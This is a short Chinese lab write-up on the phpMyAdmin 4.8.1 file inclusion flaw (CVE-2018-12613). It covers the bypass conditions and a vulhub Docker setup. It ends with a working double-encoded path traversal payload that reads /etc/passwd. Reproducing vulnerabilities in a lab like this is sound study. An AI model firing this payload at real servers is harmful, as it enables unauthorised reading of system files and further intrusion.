PhpMyadmin 远程文件包含漏洞
漏洞简述
攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。
攻击者必须经过身份验证,但在这些情况下除外:
$ cfg ['AllowArbitraryServer'] = true
:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码;
$ cfg ['ServerDefault'] = 0
:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。
影响版本
phpmyadmin 4.8.1-4.8.1
环境搭建
cd vulhub/phpmyadmin/CVE-2018-12613
docker-compose up -d
漏洞测试
先打开网页http://192.168.3.151:8080
可以通过远程文件包含查看/etc/passwd
?target=db_sql.php%253f/../../../../etc/passwd
ps:%25是%的url编码,%3f是?的url编码